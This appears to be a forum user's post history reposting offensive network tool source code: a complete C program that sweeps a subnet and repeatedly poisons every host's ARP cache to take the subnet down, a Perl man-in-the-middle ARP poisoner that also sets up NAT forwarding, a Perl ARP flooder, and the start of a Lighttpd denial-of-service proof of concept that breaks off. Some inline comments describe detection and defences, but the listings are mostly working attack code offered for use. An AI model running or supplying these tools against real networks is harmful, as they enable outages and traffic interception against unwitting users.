
Everything posted by Nytro

  1. ARP Cache Poisoning
/**
 I do very much enjoy this raw socket network programming. This code could
 and probably should be optimized in several ways, but I tried. Anyway, this
 code is for testing and educational purposes only, yadda yadda yadda...

 The program: Exploits the Address Resolution Protocol (legacy exploit, I know)
 on the whole subnet. Just read the code if you want to know more. If you can't
 read it, then learn how it works before thinking about using it.

 Reasons for compilation/runtime errors:
 (may be some dumb reasons but you never know...)
   - misconfiguration with your network (/proc/net/route and your NIC need to be configured)
   - you aren't root
   - you aren't even running Linux
   - missing header files (O_o)
   - you are an idiot

 Tested on a private network using Ubuntu Linux on a network with two machines
 running Windows XP and Slackware Linux
**/

/** And the Code: **/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/select.h>
#include <features.h>
#include <sys/types.h>
#include <net/if.h>
#include <net/ethernet.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <netinet/ether.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/icmp.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <errno.h>
#include <netdb.h>
#include <time.h>
#include <signal.h>

#define BROADCAST "ff:ff:ff:ff:ff:ff"
#define EMPTY "00:00:00:00:00:00"
/* MAC address the local interface is switched to for the duration of the run
   (see the SIOCSIFHWADDR call in main); a fixed, recognisable value. */
#define SPOOF_MAC "00:DE:AD:BE:EF:11"

/* 14 byte Ethernet Protocol header definition */
typedef struct EthernetHeader {
    unsigned char destination[6];
    unsigned char source[6];
    unsigned short protocol;
} EthernetHeader;

/* 28 byte ARP header */
typedef struct ArpHeader {
    unsigned short hardware_type;
    unsigned short protocol_type;
    unsigned char hard_addr_len;
    unsigned char prot_addr_len;
    unsigned short opcode;
    unsigned char source_hardware[6];
    unsigned int source_ip;
    unsigned char dest_hardware[6];
    unsigned int dest_ip;
}__attribute__((__packed__)) ArpHeader;

/* a data structure to hold whatever information you want to keep track of about each host */
typedef struct RemoteHost {
    unsigned char mac[6];
    unsigned int ip;
} RemoteHost;

/* Loop flag for the reply-collection loop in main; cleared by handler() on SIGCHLD. */
int childnotdead;

/* global variables for SIGNAL access, since you can't really pass any args to a signal handler... */
unsigned char orig_mac[6];
struct ifreq ifr_fix;
int sockfd_fix;

/* Fills an Ethernet header: copies the 6-byte source and destination
   addresses and stores proto in network byte order. */
void createEthHeader(EthernetHeader *ethernet_header, unsigned char *src_mac, unsigned char *dest_mac, int proto)
{
    /* set up 14 byte Ethernet header */
    memcpy(ethernet_header->source, src_mac, 6);
    memcpy(ethernet_header->destination, dest_mac, 6);
    ethernet_header->protocol = htons(proto);
}

/* Fills an Ethernet/IPv4 ARP header. The opcode is converted with htons();
   src_ip and dst_ip are stored as passed, without byte-order conversion. */
void createArpHeader(ArpHeader *ArpHeader, unsigned char *src_mac, unsigned char *dst_mac, unsigned int src_ip, unsigned int dst_ip, unsigned int opCode)
{
    /* set up 28 byte ARP header */
    ArpHeader->hardware_type = htons(ARPHRD_ETHER);
    ArpHeader->protocol_type = htons(ETHERTYPE_IP);
    ArpHeader->hard_addr_len = 6;
    ArpHeader->prot_addr_len = 4;
    ArpHeader->opcode = htons(opCode);
    memcpy(ArpHeader->source_hardware, src_mac, 6);
    ArpHeader->source_ip = src_ip;
    memcpy(ArpHeader->dest_hardware, dst_mac, 6);
    ArpHeader->dest_ip = dst_ip;
}

/* byte array to null terminated string, any other method of printing the MAC address was annoying.
   Returns a pointer to a static buffer that the next call overwrites. */
static char * mactos(unsigned char *addr)
{
    static char buffer[256];
    sprintf(buffer,"%02x:%02x:%02x:%02x:%02x:%02x",addr[0],addr[1],addr[2],addr[3],addr[4],addr[5]);
    return buffer;
}

/* unsigned int to string, easier way to manage different IP address formats IMHO.
   Prints the most significant byte first; returns a pointer to a static
   buffer that the next call overwrites. */
static char * uitos(unsigned int ip)
{
    static char bytes[256];
    sprintf(bytes, "%d.%d.%d.%d", (ip >> 24) & 0xFF, (ip >> 16) & 0xFF, (ip >> 8) & 0xFF, (ip >> 0) & 0xFF);
    return bytes;
}

/* returns a raw socket file descriptor that listens for packets on the OSI Layer 2 level;
   exits the process if socket() fails */
int createRawSockFd(int protocol)
{
    int sockfd;
    if ((sockfd = socket(PF_PACKET, SOCK_RAW, protocol)) < 0) {
        perror("socket");
        exit(-1);
    }
    return sockfd;
}

/* binds the raw socket FD to the device given as argument one;
   exits the process on failure, otherwise returns 1 */
int bindSock(char *device_name, int sockfd, int protocol)
{
    struct sockaddr_ll sll;
    struct ifreq ifr;
    bzero(&sll,sizeof(sll));
    bzero(&ifr,sizeof(ifr));
    /* get the interface index */
    /* NOTE(review): strncpy with the full IFNAMSIZ leaves ifr_name unterminated
       when device_name is IFNAMSIZ characters or longer. */
    strncpy((char *)ifr.ifr_name, device_name, IFNAMSIZ);
    if ((ioctl(sockfd, SIOCGIFINDEX, &ifr))==-1) {
        printf("Could not get the interface index.\n");
        exit(-1);
    }
    /* bind raw socket to the interface */
    sll.sll_family=AF_PACKET;
    sll.sll_ifindex=ifr.ifr_ifindex;
    sll.sll_protocol=htons(protocol);
    if ((bind(sockfd, (struct sockaddr *)&sll, sizeof(sll)))==-1) {
        printf("bind failed, couldn't bind raw socket to interface.\n");
        exit(1);
    }
    return 1;
}

/* really easy to send packets, just write it out to the socket.
   Returns 1 when write() reports the full packetSize, 0 otherwise. */
int sendPacket(int sockfd, unsigned char *packet, int packetSize)
{
    int bytes = 0;
    if ((bytes = write(sockfd, packet, packetSize)) != packetSize) {
        fprintf(stderr, "could only send %d\\%d bytes of data onto wire\n", bytes, packetSize);
        return 0;
    }
    return 1;
}

/* Hex-dumps a packet two bytes at a time, 16 bytes per output line.
   NOTE(review): packet[i+1] is read even when i is the last index, so an odd
   packet_len reads one byte past the buffer. */
void printPacket(unsigned char *packet, int packet_len)
{
    int i;
    for (i = 0; i < packet_len; i+=2) {
        if (!(i % 16))
            printf("\n");
        printf("%02x%02x ", packet[i], packet[i+1]);
    }
    printf("\n\n");
}

/* Replaces every '\n' in str with '\0' (in place). */
void strip_newline(char *str)
{
    int i;
    for (i=0; i<strlen(str); i++)
        if (str[i] == '\n')
            str[i] = '\0';
}

/* SIGCHLD handler: tells the collection loop in main that the sender child has exited. */
void handler(int sig)
{
    childnotdead = 0;
}

/* makes sure that I don't get duplicate addresses, my own, or the gateway.
   Returns 1 if ip is none of those, 0 otherwise; curr is the number of
   entries already stored in hostlist. */
int validTarget(unsigned int ip, unsigned int localip, unsigned int gatewayip, RemoteHost *hostlist, int curr)
{
    int i;
    if ((ip == localip) || (ip == gatewayip))
        return 0;
    for (i = 0; i < curr; i++)
        if (ip == hostlist[i].ip)
            return 0;
    return 1;
}

void banner( void )
{
    printf("\nARP DoS by suid\n\n");
}

/* SIGINT handler: writes the saved original MAC (orig_mac) back to the
   interface through the globals ifr_fix/sockfd_fix, then exits.
   NOTE(review): printf(), ioctl() reporting via perror() and exit() are called
   from a signal handler; none of these are async-signal-safe. */
void fixMAC(int signum)
{
    printf("Setting MAC address back to %s\n", mactos(orig_mac));
    memcpy(&ifr_fix.ifr_hwaddr.sa_data, orig_mac, 6);
    if (ioctl(sockfd_fix, SIOCSIFHWADDR, &ifr_fix) < 0) {
        perror("SIOCSIFHWADDR");
        exit(-1);
    }
    exit(signum);
}

/* Prints the prompt q and returns a heap buffer holding the line read from stdin.
   NOTE(review): ans is a char *, so sizeof(ans)-1 is the pointer size minus one,
   not the 10 bytes allocated; malloc() is unchecked and no caller in this file
   frees the result. */
static char * getAns(char *q)
{
    char *ans = (char *)malloc(sizeof(char)*10);
    printf("%s", q);
    fgets(ans, sizeof(ans)-1, stdin);
    strip_newline(ans);
    return ans;
}

/* Reads a space-separated list of host indexes from stdin, zeroes the ip of
   each listed entry and copies the remaining entries into a new array.
   NOTE(review): hosts is allocated as numhosts BYTES but used as an int array;
   the parsed indexes are never range-checked before indexing host_list; token
   is dereferenced by atoi() without a NULL check; and the final assignment only
   changes the local copy of host_list, so the caller never sees the new list. */
void removeHosts(struct RemoteHost *host_list, int numhosts)
{
    char buff[1024], *token;
    int *hosts = malloc(numhosts), i = 1, j, k = 0;
    RemoteHost *new_host_list;
    int newNumHosts;
    printf("Format: <host0> <host1> <host2> ... <hostn>\n");
    fgets(buff, sizeof(buff)-1, stdin);
    token = strtok(buff, " ");
    hosts[0] = atoi(token);
    while ((token = strtok(NULL, " ")) != NULL) {
        hosts[i] = atoi(token);
        i++;
    }
    newNumHosts = numhosts - i;
    printf("Now removing...\nHosts: ");
    for (j = 0; j < i; j++)
        printf("%s\n", uitos(ntohl(host_list[hosts[j]].ip)));
    printf("\n");
    for (j = 0; j < i; j++)
        host_list[hosts[j]].ip = 0;
    new_host_list = (RemoteHost *)malloc(sizeof(RemoteHost)*newNumHosts);
    for (i = k; i < numhosts; i++)
        if (host_list[i].ip == 0)
            continue;
        else {
            new_host_list[k] = host_list[i];
            k++;
        }
    host_list = new_host_list;
}

/* Program flow, as written below:
     1. read the default route from /proc/net/route, bind a packet socket to that interface;
     2. save the interface MAC in orig_mac and set the interface MAC to SPOOF_MAC;
     3. broadcast one ARP request per address of the local subnet (about ten per
        second) from a child process while the parent records ARP replies;
     4. loop forever sending each recorded host an ARP reply whose sender IP is
        the gateway's and whose sender hardware address is the spoofed local MAC.

   What this looks like from the defending side, derived from the packets built here:
     - a burst of ARP requests sweeping the whole subnet from one sender;
     - a station whose MAC is 00:DE:AD:BE:EF:11 (SPOOF_MAC above);
     - unsolicited ARP replies in which the Ethernet source address (the gateway's
       real MAC) differs from the ARP sender hardware address, repeated roughly
       every 30 seconds plus one second per host;
     - on the affected hosts, the ARP cache entry for the default gateway changing
       to a MAC that is not the gateway's.
   Switch-side ARP validation (dynamic ARP inspection backed by DHCP snooping) or
   a static ARP entry for the gateway on hosts prevents such replies from being
   accepted. */
int main(int argc, char **argv)
{
    EthernetHeader *arp_ethernet_header, *ethernet_header_reply;
    ArpHeader *arp_header, *arp_header_reply;
    unsigned int device_in_addr, gateway_in_addr, netmask, subnet, *remote_hosts, numhosts;
    int sockfd, i, zeros, numIfs, ArpPacketSize, pid, bytes, hosts_online;
    unsigned char *ArpPacket, device_mac[6], gateway_mac[6], packet_recv[2048];
    char buff[1024], pbuff[1024], *token, *device_name, answer[3];
    FILE *pipe;
    struct ifreq *ifr, *ifr_item;
    struct ifreq ifr_dat;
    struct ifconf ifc;
    struct sockaddr_in sin, *sin2;
    struct arpreq areq;
    struct timeval tv;
    struct in_addr ipaddr;
    fd_set readfds;
    RemoteHost *remote_host_info;

    banner();

    /* make sure user has root for raw sockets */
    if (getuid() != 0) {
        fprintf(stderr, "This program requires root priviledges to execute!\n");
        exit(-1);
    }

    /* Ctrl-C restores the original MAC via fixMAC() */
    signal(SIGINT, fixMAC);
    sockfd = createRawSockFd(ETH_P_ALL);
    sockfd_fix = sockfd;

    /** GET NIC NAME, NIC IP, NIC MAC, GATEWAY IP, GATEWAY MAC, SUBNET MASK (NUMBER OF HOSTS ON SUBNET) **/
    if ((pipe = popen("cat /proc/net/route", "r")) == NULL) {
        fprintf(stderr, "pipe to cat route failed.\n");
        exit(-1);
    }
    /* For each route line: the first field is the interface name; if the
       second field is "00000000" (default route) the third field is parsed as
       the gateway address in hex. device_name points into pbuff. */
    while (fgets(pbuff, sizeof(pbuff), pipe) != NULL) {
        token = strtok(pbuff, "\t\n ");
        device_name = token;
        while (token != NULL) {
            token = strtok(NULL, "\t\n ");
            if (!strcmp(token, "00000000")) {
                token = strtok(NULL, "\t\n ");
                gateway_in_addr = strtol(token, NULL, 16);
                break;
            } else {
                break;
            }
            token = strtok(NULL, "\t\n ");
        }
    }

    /* bind socket to this default network interface */
    bindSock(device_name, sockfd, ETH_P_ALL);

    /* get list of network address assigned NIC's */
    ifc.ifc_len = sizeof(buff);
    ifc.ifc_buf = buff;
    if (ioctl(sockfd, SIOCGIFCONF, &ifc) < 0) {
        perror("SIOCGIFCONF");
        exit(-1);
    }

    /* find NIC with default route, get NIC IP address */
    ifr = ifc.ifc_req;
    numIfs = ifc.ifc_len / sizeof(struct ifreq);
    for (i = 0; i < numIfs; i++) {
        ifr_item = &ifr[i];
        if (!strcmp(ifr_item->ifr_name, device_name))
            device_in_addr = (((struct sockaddr_in *)&ifr_item->ifr_addr)->sin_addr).s_addr;
    }

    /* get NIC/GATEWAY MAC address */
    strncpy((char *)ifr_dat.ifr_name, device_name, IFNAMSIZ);
    if (ioctl(sockfd, SIOCGIFHWADDR, &ifr_dat) < 0) {
        perror("SIOCGIFHWADDR");
        exit(-1);
    }
    /* keep the real MAC so fixMAC() can put it back */
    memcpy(orig_mac, ifr_dat.ifr_hwaddr.sa_data, 6);

    /* this is SO ugly but meh, it works */
    /* look the gateway's MAC up in the kernel ARP table (SIOCGARP) */
    memset(&areq, 0, sizeof(areq));
    sin2 = (struct sockaddr_in *)&areq.arp_pa;
    sin2->sin_family = AF_INET;
    ipaddr.s_addr = gateway_in_addr;
    sin2->sin_addr = ipaddr;
    sin2 = (struct sockaddr_in *)&areq.arp_ha;
    sin2->sin_family = ARPHRD_ETHER;
    strncpy(areq.arp_dev, device_name, 15);
    if (ioctl(sockfd, SIOCGARP, (caddr_t)&areq) == -1) {
        perror("SIOCGARP: check your ARP table");
        exit(-1);
    }
    memcpy(gateway_mac, (&areq.arp_ha)->sa_data, 6);

    /* change the interface's hardware address to SPOOF_MAC; device_mac holds
       that value from here on, and ifr_fix keeps the request for fixMAC() */
    memcpy(&ifr_dat.ifr_hwaddr.sa_data,(unsigned char *)ether_aton(SPOOF_MAC),6);
    if (ioctl(sockfd, SIOCSIFHWADDR, &ifr_dat) < 0) {
        perror("SIOCSIFHWADDR");
        exit(-1);
    }
    memcpy(device_mac, ifr_dat.ifr_hwaddr.sa_data, 6);
    ifr_fix = ifr_dat;

    /* get subnet mask and network address to calculate number of hosts */
    if (ioctl(sockfd, SIOCGIFNETMASK, &ifr_dat) < 0) {
        perror("SIOCGIFNETMASK");
        exit(-1);
    }
    memcpy(&sin, &ifr_dat.ifr_addr, sizeof(struct sockaddr));
    netmask = sin.sin_addr.s_addr;
    subnet = (netmask & device_in_addr);
    /* count the trailing zero bits of the host-order netmask */
    for (i=0; i<32; i++)
        if (ntohl(netmask) & (1<<i))
            break;
    zeros = i;
    numhosts = (1<<zeros);

    /* fill host_addrs with possible assigned addresses, skip 0x00?????? 0xFF?????? */
    remote_hosts = (unsigned int *)malloc(sizeof(unsigned int)*(numhosts));
    for (i = 0; i < numhosts; i++)
        remote_hosts[i] = (ntohl(subnet) | i);
    /** END NETWORK INFORMATION QUERIES **/

    /** CREATE DEFAULT ARP PACKET **/
    /* create memory segment for ARP packet header */
    ArpPacketSize = sizeof(EthernetHeader) + sizeof(ArpHeader);
    ArpPacket = (unsigned char *)malloc(ArpPacketSize);
    arp_ethernet_header = (EthernetHeader *)ArpPacket;
    arp_header = (ArpHeader *)(ArpPacket + sizeof(EthernetHeader));

    /* fill in ARP Request packet header */
    createArpHeader(arp_header, device_mac, (ether_aton(EMPTY))->ether_addr_octet, device_in_addr, 0, ARPOP_REQUEST);

    /* fill in ARP packet Ethernet header */
    createEthHeader(arp_ethernet_header, device_mac, (ether_aton(BROADCAST))->ether_addr_octet, ETHERTYPE_ARP);
    /** END DEFAULT PACKETS **/

    /** CREATE LIST OF HOSTS' IP -> MAC ADDRESSES VIA ARP REQUEST **/
    /* use two different processes to handle sending ARP Requests and receiving ARP Replies
       both for increased speed and reliability */
    setbuf(stdout, NULL);
    printf("\n");
    if ((pid = fork()) == 0) {
        /* send the ARP Requests out to all hosts in remote_hosts */
        for (i = 0; i < numhosts; i++) {
            if (ntohl(remote_hosts[i]) == device_in_addr)
                continue;
            arp_header->dest_ip = htonl(remote_hosts[i]);
            if (!sendPacket(sockfd, ArpPacket, ArpPacketSize)) {
                perror(" [*] Packet send failed!\n");
                exit(-1);
            }
            /* some networks create Ethernet collisions with dropped packets as a result
               so slow it down a small amount */
            usleep(100000);
        }
        /* leave the parent ten more seconds to collect late replies */
        sleep(10);
        exit(1);
    } else {
        /* listen for ARP Replies from the hosts on the network and record the MAC addresses */
        remote_host_info = malloc(sizeof(RemoteHost) * numhosts);
        signal(SIGCHLD, handler);
        childnotdead = 1;
        printf("Gathering MAC addresses...\n");
        printf("This may take a while so go get a drink or something.\n");
        i = 0;
        while (childnotdead) {
            /* watch for ARP Replies */
            FD_ZERO(&readfds);
            FD_SET(sockfd, &readfds);
            /* NOTE(review): tv.tv_usec is never assigned before select() */
            tv.tv_sec = 2;
            memset(packet_recv, 0, sizeof(packet_recv));
            if (select(sockfd+1, &readfds, NULL, NULL, &tv) < 0) {
                perror("select()");
            }
            if (!childnotdead)
                break;
            if (FD_ISSET(sockfd, &readfds)) {
                if ((bytes = read(sockfd, packet_recv, sizeof(packet_recv))) < 0) {
                    perror("read");
                }
                /* NOTE(review): only the Ethernet header length is checked before
                   the ARP header fields are read; the buffer was zeroed above, so
                   a short frame yields zero fields rather than stale data. */
                if (bytes > sizeof(EthernetHeader)) {
                    ethernet_header_reply = (EthernetHeader *)packet_recv;
                    if (ntohs(ethernet_header_reply->protocol) == ETHERTYPE_ARP) {
                        arp_header_reply = (ArpHeader *)(packet_recv + sizeof(EthernetHeader));
                        if (ntohs(arp_header_reply->opcode) == ARPOP_REPLY) {
                            /* make sure source is not myself, the default route, or a duplicate entry */
                            if (validTarget(arp_header_reply->source_ip, device_in_addr, gateway_in_addr, remote_host_info, i)) {
                                memcpy(remote_host_info[i].mac, arp_header_reply->source_hardware, 6);
                                remote_host_info[i].ip = arp_header_reply->source_ip;
                                i++;
                            }
                        }
                    }
                }
            }
        }
        hosts_online = i;
        printf("MAC addresses enumerated, %d machines attached to current subnet.\n", hosts_online);
        /* answer is 3 bytes; getAns() returns a heap buffer that is not freed */
        memcpy(answer, getAns("Display list of IP -> MAC? (y/n) "), sizeof(answer));
        if (!strcmp(answer, "yes") || !strcmp(answer, "y")) {
            for (i = 0; i < hosts_online; i++)
                printf("(%d) %s -> %s\n", i, uitos(ntohl(remote_host_info[i].ip)), mactos(remote_host_info[i].mac));
            memset(answer, 0, sizeof(answer));
            memcpy(answer, getAns("Would you like to remove any of these hosts from this list? (y/n) "), sizeof(answer));
            if (!strcmp(answer, "yes") || !strcmp(answer, "y")) {
                removeHosts(remote_host_info, hosts_online);
            }
            sleep(10);
        }
    }
    /** END MAC ADDRESS **/

    printf("\n");

    /** SEND SPOOFED ARP REPLY TO EACH HOST ONLINE **/
    /* Each reply carries sender IP = gateway_in_addr and sender hardware
       address = device_mac (the spoofed MAC), while the Ethernet source is the
       gateway's real MAC. */
    for ( { //for()ever!!
        for (i = 0; i < hosts_online; i++) {
            printf("Poisoning %s...\n", uitos(ntohl(remote_host_info[i].ip)));
            sleep(1);
            createArpHeader(arp_header, device_mac, remote_host_info[i].mac, gateway_in_addr, remote_host_info[i].ip, ARPOP_REPLY);
            createEthHeader(arp_ethernet_header, gateway_mac, remote_host_info[i].mac, ETHERTYPE_ARP);
            //printPacket(ArpPacket, ArpPacketSize);
            if (!sendPacket(sockfd, ArpPacket, ArpPacketSize)) {
                perror(" [*] Packet send failed!\n");
                exit(-1);
            }
        }
        printf("Subnet should be down. Repoisoning in 30s ...\n\n");
        sleep(30);
        printf("Repoisoning!\n");
        sleep(2);
    }
    /** END REPLIES **/

    free(ArpPacket);
    close(sockfd);
    return 0;
}
Sursa: r00tsecurity -> Source Code Center :: ARP Cache Poisoning
  2. Monkey || ARP Poisoning tool
# monkey.pl
#
# ARP POISONING FrameWork
# Copyright 2011 madstein <madstein@f0r3ns1cs>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
# Reviewer summary of what the script does, from the code below:
#   option 1 - every 2 seconds sends two ARP replies: one telling the target
#              that the gateway IP is at the local MAC, one telling the gateway
#              that the target IP is at the local MAC;
#   option 2 - sends seven rounds of ARP replies carrying the real gateway and
#              target MACs, which puts the correct mappings back.
# Both options first set the iptables FORWARD policy to ACCEPT and add a
# MASQUERADE rule on the chosen interface.
# On the wire, option 1 shows up as unsolicited ARP replies at a fixed ~2 s
# interval in which two different IPs (gateway and target) map to one MAC;
# ARP-cache monitoring on hosts or ARP inspection on the switch flags this.
use Net::ARP ;
use Term::ANSIColor;

print q{ -------------------------- MADSTEIN ARP-OPT -------------------------- 1- MITM 2- REPING VICTIM };
print "\n";
print ">Choose OPERANDI:\n";
print color("green"),"\n>>>\n",color("reset");
$menu = <STDIN>;
chomp $menu;

# Note: == is a numeric comparison in Perl, so the menu input is compared as a number.
if($menu == "1") {
    print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ;
    $iface = <STDIN>;
    print color ("red"), "[+]",color ("reset"), "Insert Gateway IP \n" ;
    $gateway = <STDIN> ;
    print color ("red"), "[+]",color ("reset"), "Insert Target IP \n" ;
    $target = <STDIN> ;
    chomp ($gateway,$target,$iface);

    # Enable forwarding/NAT of the intercepted traffic.
    # NOTE(review): $iface comes straight from STDIN and is interpolated into a
    # shell command line without validation.
    system "iptables -P FORWARD ACCEPT";
    system "iptables --table nat -A POSTROUTING -o $iface -j MASQUERADE";

    # Note: sometimes Net::ARP fails to look up the target MAC.
    # If you ever encounter that kind of problem just reload the script
    # or hardcode the target MAC.
    $gatemac = Net::ARP::arp_lookup($dev,$gateway);
    $targetmac = Net::ARP::arp_lookup($dev,$target);
    $mymac = Net::ARP::get_mac("$iface");

    if ($gatemac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Gateway MAC\n"; die }
    if ($targetmac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Target MAC\n"; die}
    if ($mymac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Local MAC\n"; die }
    else {
        system "clear";
        print color ("red"), q{ < wtf > ----- \ \ .:!!!!!:. .!!!!!:. .!!!!!!!!!! ~~~~!!!!!!. .!!!!!!!UWWW$$$ :$$NWX!!: .!!!!XUWW$$$$$$$$$P $$$$$##WX!: .<!!!!UW$$$$" $$$$$$$$# $$$$$ $$$UX :!!UW$$$$$$$$$ 4$$$$$* ^$$$B $$$$\ $$$$$$$$$$$$ d$$R" "*$bd$$$$ '*$$$$$$$$$$$o+#" """" """"""" PURE POISON }, color ("reset");
        print color ("green"),"[+]",color ("reset"),"Poison on the Way\n";
        print color ("green"),"[+]",color ("reset"),"Monkey in the Middle off $gateway $gatemac |and| $target $targetmac\n";
        while (1) {
            # Reply to the target: gateway IP announced with the local MAC.
            Net::ARP::send_packet($iface, $gateway, $target, $mymac, $targetmac, 'reply');
            # Reply to the gateway: target IP announced with the local MAC.
            Net::ARP::send_packet($iface, $target, $gateway, $mymac, $gatemac, 'reply');
            # One dot on STDERR per round; rounds repeat every 2 seconds.
            print STDERR color ("green"),".", color ("reset");
            sleep (2);
        }
    }
}

if ($menu =="2"){
    print color ("green"), "[+]",color ("reset"), "ARP Repinger \n" ;
    print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ;
    $iface = <STDIN>;
    print color ("red"), "[+]",color ("reset"), "Insert Gateway IP \n" ;
    $gateway = <STDIN> ;
    print color ("red"), "[+]",color ("reset"), "Insert Target IP \n" ;
    $target = <STDIN> ;
    chomp ($gateway,$target,$iface);

    # Same iptables changes as option 1, although this branch only restores ARP entries.
    system "iptables -P FORWARD ACCEPT";
    system "iptables --table nat -A POSTROUTING -o $iface -j MASQUERADE";

    # Note: sometimes Net::ARP fails to look up the target MAC.
    # If you ever encounter that kind of problem just reload the script
    # or hardcode the target MAC.
    $gatemac = Net::ARP::arp_lookup($dev,$gateway);
    $targetmac = Net::ARP::arp_lookup($dev,$target);
    $mymac = Net::ARP::get_mac("$iface");

    if ($gatemac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Gateway MAC\n"; die }
    if ($targetmac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Target MAC\n"; die}
    if ($mymac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Local MAC\n"; die }
    else {
        system "clear";
        print color ("yellow"), q{ < wtf > ----- \ \ .:!!!!!:. .!!!!!:. .!!!!!!!!!! ~~~~!!!!!!. .!!!!!!!UWWW$$$ :$$NWX!!: .!!!!XUWW$$$$$$$$$P $$$$$##WX!: .<!!!!UW$$$$" $$$$$$$$# $$$$$ $$$UX :!!UW$$$$$$$$$ 4$$$$$* ^$$$B $$$$\ $$$$$$$$$$$$ d$$R" "*$bd$$$$ '*$$$$$$$$$$$o+#" """" """"""" PURE POISON }, color ("reset");
        print color ("green"),"[+]",color ("reset"),"REPINGER VERSION\n";
        for ($count = 7; $count >= 1; $count--) {
            # Reply to the target carrying the gateway's own MAC for the gateway IP.
            Net::ARP::send_packet($iface, $gateway, $target, $gatemac, $targetmac, 'reply');
            # Reply to the gateway carrying the target's own MAC for the target IP.
            Net::ARP::send_packet($iface, $target, $gateway, $targetmac, $gatemac, 'reply');
            # One dot on STDERR per round; seven rounds, 2 seconds apart.
            print STDERR color ("green"),".", color ("reset");
            sleep (2);
        }
    }
    print "REPINGED\n";
}
Sursa: r00tsecurity -> Source Code Center :: Monkey || ARP Poisoning tool
  3. Network Destroyer ARP TCP Flooder
[COLOR=#888] [/COLOR]
#!/usr/bin/perl
#ubuntu sudo apt-get install libnet-arp-perl
#ubuntu sudo apt-get install libnet-rawip-perl
#Madstein - arp tester
#
# Reviewer summary, from the code below: after resolving the target's MAC the
# script loops without delay, sending ARP replies to the target in which the
# sender IP is four random numbers and the sender MAC is six random decimal
# numbers joined by ":". Despite the title, only ARP packets are sent;
# Net::RawIP is loaded but not used in the listing.
# On the wire this is a sustained stream of ARP replies to one host from
# constantly changing sender IP/MAC pairs; per-port ARP rate limiting or ARP
# inspection on the switch bounds or drops it.
use Net::RawIP;
use Term::ANSIColor;
use Net::ARP ;

inicio:
print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ;
$iface = <STDIN>;
print color ("red"), "[+]",color ("reset"), "Insert IP to Get Mac Addr \n" ;
$target = <STDIN> ;
chomp ( $target,$iface ) ;
$getmac = Net::ARP::arp_lookup($dev,$target);
my $count = 0;

# A failed lookup restarts the program from the "inicio" label.
if ($getmac =~ unknow ) {
    print "Something went Wrong The Target Retrieved an unknow Mac addr\n";
    print "Prees Any Key To Restart Program\n";
    $restart = <STDIN>;
    goto inicio ;
}
elsif ($getmac =~ "00:00:00:00:00:00" ) {
    print "00:00:00:00:00:00 retrived error\n";
    print "Prees Any Key To Restart Program\n";
    $restart = <STDIN>;
    goto inicio ;
}
else {
    print color ("red"), "[+]",color ("reset"), " $target mac is $getmac \n";
    print color ("green"), "[+]",color ("reset"), " type.. yes ..to flood || .. no .. to restart Program \n";
    $flood = <STDIN>;
    if ($flood =~ yes ){
        while (1) {
            # Random sender IP and MAC for every packet.
            my $src = join ".", map int rand 255, 1 .. 4;
            my $spoofedmac = join ":", map int rand 99, 1 .. 6, ;
            Net::ARP::send_packet($iface,      # Device
                                  $src,        # Source IP
                                  $target,     # Destination IP
                                  $spoofedmac, # Source MAC
                                  $getmac,     # Destination MAC
                                  'reply');    # ARP operation
            $count++;
            print "Packeth Sent Tru $iface to $target using $src as ip ";
            print "with this spoofed mac $spoofedmac amount $count";
        }
    }
    elsif ($flood =~ "no") { system " clear"; goto inicio;}
}
[COLOR=#888] [/COLOR]
Sursa: r00tsecurity -> Source Code Center :: Network Destroyer ARP TCP Flooder
  4. Lighttpd 1.4.30 / 1.5 Denial Of Service Authored by Adam Zabrocki Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit.
/*
 * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang
 *
 * Here the vulnerable code (src/http_auth.c:67)
 *
 * --- CUT ---
 * static const short base64_reverse_table[256] = {
 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F
 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F
 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F
 *         52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F
 *         -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F
 *         15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F
 *         -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F
 *         41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F
 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F
 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F
